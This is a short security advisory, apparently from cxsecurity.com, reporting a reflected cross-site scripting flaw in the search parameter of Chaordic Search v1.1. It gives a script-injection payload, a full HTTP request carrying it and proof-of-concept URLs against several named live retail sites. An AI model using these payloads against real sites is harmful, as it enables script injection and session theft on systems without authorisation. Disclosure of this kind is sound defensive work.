Chaordic Search v1.1 Cross Site Scripting

Published
Credit
Risk
2016.12.10
Felipe Andrian Peixoto
Low
CWE
CVE
Local
Remote
CWE-79
N/A
No
Yes

[+] Cross Site Scripting on Chaordic Search v1.1

[+] Date: 09/12/2016

[+] Risk: LOW

[+] CWE number: CWE-79

[+] Author: Felipe Andrian Peixoto

[+] Vendor Homepage: https://www.chaordic.com.br/

[+] Contact: felipe_andrian@hotmail.com

[+] Tested on: Gnu/Linux

[+] Exploit :

http://busca.host/?q= [ XSS PAYLOAD ]

[+] Payload :

?q="><script>alert('XSS Payload')</script>

[+] Example :

GET /?q=%22%3E%3Cscript%3Ealert(%27OXSS Payload%27)%3C/script%3E HTTP/1.1
Host: busca.submarino.com.br
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: chaordic_anonymousUserId=anon-a1fa1360-bde5-11e6-afd4-a1f7c36320fb; cs_preferenceOrder=popularity; csDisplayType=grid
Connection: keep-alive

[+] Poc :

http://busca.saraiva.com.br/?q="><script>alert('XSS')</script>
http://busca.camisariacolombo.com.br/?q="><script>alert('XSS')</script>
http://busca.dentalcremer.com.br/?q="><script>alert('XSS')</script>


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com